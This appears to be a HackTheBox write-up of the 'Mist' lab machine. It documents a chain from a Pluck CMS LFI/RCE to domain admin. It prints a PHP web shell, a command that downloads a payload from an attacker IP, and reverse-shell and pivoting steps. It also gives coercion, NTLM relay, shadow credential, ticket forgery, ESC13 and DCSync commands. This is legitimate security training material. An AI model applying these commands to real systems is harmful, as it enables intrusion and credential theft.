HackTheBox — Mist
Mist an insane difficult machine involved an instance of pluck being vulnerable to both local file inclusion (LFI) and remote code execution (RCE), uploading a php shell in a excluded directory to avoid defender flagging it, enumerating the filesystem to escalate privileges through lnk files, with ligolo-ng pivoting into the network to reach DC01 in order to perform shadow credentials through NTLM relay over HTTP (since SMB signing was enabled) on MS01 , with administrator enumerating the file system again to find keepass file with credentials which had ReadGMSA, performing shadow credentials again on a domain user and then escalating to domain admin through ESC13 abuse.
Nmap scan report for 10.10.11.17
Host is up (0.30s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not setFrom the scan we have only port 80 open, visiting the web server we have Pluck hosted
On trying to login we’ll see the version being disclosed
This version is vulnerable to authenticated remote code execution but currently we don’t have any credentials
Trying the default ones like password and admin:admin didn’t worked, fuzzing for files, there’s cgi-bin directory which can reveal something here
So fuzzing again at this directory for any pl files, we can find printenv.pl
This file lists some configuration for XAMPP, showing a username as well, svc_web
Getting admin access through Local File Inclusion (LFI)
Checking the github issues for Pluck CMS, there seems to be LFIon /data/modules/albums/albums_getimage.php?image=
On trying to read /etc/passwd it was detecting ../
We can however view the albums on pluck cms as shown in the poc for LFI from where we can list contents of albums directory revealing admin_backup.php
This can be read by just appending admin_backup.php to image parameter
Having the admin hash, we can attempt to crack it using hashcat by using mode 1700 which is for SHA-512
hashcat -a 0 -m 1700 ./admin_hash.txt /usr/share/wordlists/rockyou.txt --forceWith this password we can login as admin on pluck
Gaining a shell as svc_web
Now we can use the previous RCE exploit, uploading a module by zipping a php file having GET parameter being passed into system function for executing commands
<?php system($_GET['cmd']); ?>But this file will be deleted within 1–2 minutes so there’s probably a cleanup script or defender removing these files, for getting a shell, upload and execute netcat to get a reverse shell as svc_web
Again as soon as the php file gets removed our shell will die
So what we can do here is to upload a php file in defender’s exclusion list where it wont’ delete any malicious files, checking the permissions of C:\xampp, we have write access on this directory, so we can upload a php file there and then get a shell
<?php system('curl http://10.10.16.17/uwu.php -o C:/xampp/htdocs/uwu.php'); ?>Checking the privileges of this local user, it doesn’t seem to have any privilege which can lead to local admin
Running arp -a to see the hosts on the network we get one IP 192.168.100.100 which seems it's the IP of domain controller
For accessing this host from our kali machine we need to perform pivoting from MS01 using ligolo-ng
sudo ip link set ligolo up
sudo ip route add 192.168.100.0/24 dev ligoloWe can confirm the reachability of DC01 by pinging or running nxc to check smb
Here I tried checking guest account for brute forcing SIDs to get a list of domain users but that account was disabled
Also tried checking for AS-REP roasting on the two domain accounts we can see on MS01 but it also failed
Enumerating shares with null authentication didn’t yield any stuff as well
Moving back to MS01 and enumerating the system by uploading winpeas in C:/xampp/htdocs/ as it is excluded by defender
Escalating Privileges (brandon.keywarp)
Brandon.keywarp is logged in onto this system so there might be some tasks or files being checked by this user, there's also Common Applications directory which is writable by local users
This directory contains few lnk files
Transferring any one of the lnk files on our windows machine to edit the location of the shortcut
Now editing this lnk file to execute nc from C:\xampp\htdocsto get a shell
From here we can run bloodhound to enumerate the domain
Brandon didn’t had any ACLs and wasn’t in any special group
It’s the same with Sharon
But there’s Operatives group which has ReadGMSAPasswowrd on SVC_CA$ account
And this group has these two group members who can also PSRemote (gain remote session through winrm) on DC01
Recovering brandon’s NThash
Since smb signing is enabled on DC01, we need to relay using HTTP authentication which can be done only if WebClient service is enabled which is currently disabled, this can be checked using GetWebDAVStatus
For enabling this service, start responder then try mapping the share to kali machine with http protocol
Since we have a shell as brandon, we can verify if ADCS is installed on DC using certutil
Using certify we can list down the templates which are enabled, if User template is enabled we can then request a certificate and get the NTHash of brandon
Certify.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User /domain:mist.htbConverting the pem into pfx file in order to use it for authenticating from certipy to retrieve NTLM hash of brandon
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxcertipy auth -pfx cert.pfx -dc-ip 192.168.100.100 -username Brandon.Keywarp -domain mist.htbShadow Credentials Through NTLM Relay
Now that have brandon’s hash, we can use PetitPotam to cause coercion for MS01 with webdav protocol which is going to perform HTTP authentication leading to shadow credentials on MS01 but before that let’s verify if we can coerce the authentication on smb, for this we need to start chisel with socks proxy
chisel.exe client 10.10.16.43:9000 R:socks
chisel server --reverse -p 9000For HTTP coercion, webclient service will be enabled on port 8080, so we need to redirect that port from MS01 to our kali machine this is known as port bending, for this I’ll be using StreamDivert for redirecting outbound traffic on port 8080 to my kali machine on port 80
tcp > 8080 0.0.0.0 -> 10.10.16.43 80Running PetitPotam again, this time setting the listener to be MS01
proxychains python3 /opt/PetitPotam/PetitPotam.py -u brandon.keywarp -hashes ':hash' MS01@8080/test 192.168.100.101This machine account hash can now be relayed to DC01 on ldaps to perform shadow credentials using ntlmrealyx (make sure turn HTTP Off from responder.conf), normally machine accounts can edit their own msDS-KeyCredentialLink attribute but to my surprise this did not worked as it showed it's missing some rights here
This is probably due to value is already set and for some reason we cannot overwrite this property, there’s another variation of ntlmrelayx which supports both clearing and setting the value of msDS-KeyCredentialLink using an interactive ldap shell, so relaying it again but this time using this version
Getting administrator on MS01
We now have the certificate and the password, using gettgtpkinit from PKINITools we can retrieve MS01 aeskey and TGT
NTHash can be recovered as well either by certipy auth or using Rubeus
Rubeus.exe asktgt /user:MS01$ /domain:mist.htb /certificate:./orGRT9Km.pfx /password:aCSx4xhH2ZqvYxSAseyK /getcredentials /nowrapImpersonating as local admin on MS01 using HOST service
Rubeus.exe s4u /self /user:MS01$ /rc4:4A74FC05400345D580CF58AEC3E6D833 /altservice:host/ms01.mist.htb /impersonateuser:administrator /ptt /nowrapConverting this kirbi (base64) ticket into ccache which is supported by impacket
And using wmiexec.py to get an interactive shell as admin
This can also be done purely through linux
proxychains ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/MS01.mist.htb -nthash 4A74FC05400345D580CF58AEC3E6D833 -user-id 500 AdministratorShell as OP_Sharon
From bloodhound we saw OP_Sharon is member of Operatives group who ha ReadGMSA permission on SVC_CA$ and had PSRemote on DC, so sharon on MS01 might be interesting, checking the documents directory we have sharon.kdbx file which is a keepass database file
Reading this file will required a password
From pictures directory, we have two image files
The second image shows us a password
The text UA7cpa[#1!_*ZX doesn't represent the base64 encoded value in the image
So we might be missing some characters that we need to recover, creating a wordlist with crunch to brute force the last character
Having the master password we can access the keepass file and get the password for sharon
For moving forward, pivoting using ligolo-ng as proxychains is a bit slow in reaching to MS01 internal ports and DC01, by creating ligolo interface device and adding 192.168.100.0/24 route
Spraying this password on both sharon and op_sharon
Since op_sharon has PSRemote on DC, we can login through winrm
For reading GMSA password, we can use AD module but I’ll be using gMSADumper
python3 /opt/gMSADumper/gMSADumper.py -u 'OP_SHARON.MULLARD' -p 'pass' -d mist.htb -l 192.168.100.100Shadow credentials on SVC_CABACKUP
Now with this account we can get access to SVC_CABackup user by having AddKeyCredentialLink access control, which basically is again performing shadow credentials attack through pyWhisker
python3 pywhisker.py -u 'svc_ca$' -H 'hash' -t SVC_CABACKUP -a add -d mist.htb --dc-ip 192.168.100.100To retrieve the NThash, using the same steps which were performed for MS01$
Rubeus.exe asktgt /user:SVC_CABACKUP /domain:mist.htb /certificate:./SW9Iavcw.pfx /password:ciCdAJ1qPObnqR57ltDL /getcredentials /nowrapGetting Domain Admin Through ESC13
Recently two new ADCS attacks were introduced dubbed as ESC13 & ESC14, from certipy’s github issues we can see support for ESC13 being added as well
So cloning this version of certipy , we can find a certificate template ManagerAuthentication being vulnerable to ESC13
This template has an Extended Key Usage (EKU) for Client Authentication which means that through this certificate we can perform authentication, this certificate is linked with Certificate Managers group and members of certificate services can enroll for this certificate
This can grant privileges of a linked group to the user who enrolls for it without being part of that group, this is known as ESC13. Requesting the certificate with ManagerAuthentication template, this is going to show an error for public key not meeting the minimum size
By default certipy uses 2048 as the length of public key, this can be changed to 4096 with -key-size parameter
certipy req -u 'SVC_CABACKUP' -hashes 'hash' -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -template 'ManagerAuthentication' -key-size 4096We have the certificate for svc_backup but this holds the permissions of certificate managers, so requesting a TGT with this certificate
python3 gettgtpkinit.py -cert-pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 mist.htb/SVC_CABACKUP SVC_CABACKUP.ccacheListing the templates again, we can see BackupSvcAuthentication can be enrolled with CA Backup members which we are with the current certificate that we have
On requesting this certificate we can again privileges of ServiceAccounts group which is a member of Backup Operators group
Being in this group we can backup the registry hives to dump SAM hashes of DC account and then perform DCSync
certipy req -u 'SVC_CABACKUP@mist.htb' -k -no-pass -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -target DC01.mist.htb -template 'BackupSvcAuthentication' -key-size 4096Exporting this TGT and starting smb server through smbserver.py to backup the SAM, SYSTEM and SECURITY from the registry hive using reg.py
(For dumping SYSTEM file, it will take some time), after having these 3 files running secretsdump.py locally and using the $MACHINE.ACC hash to performing dcsync
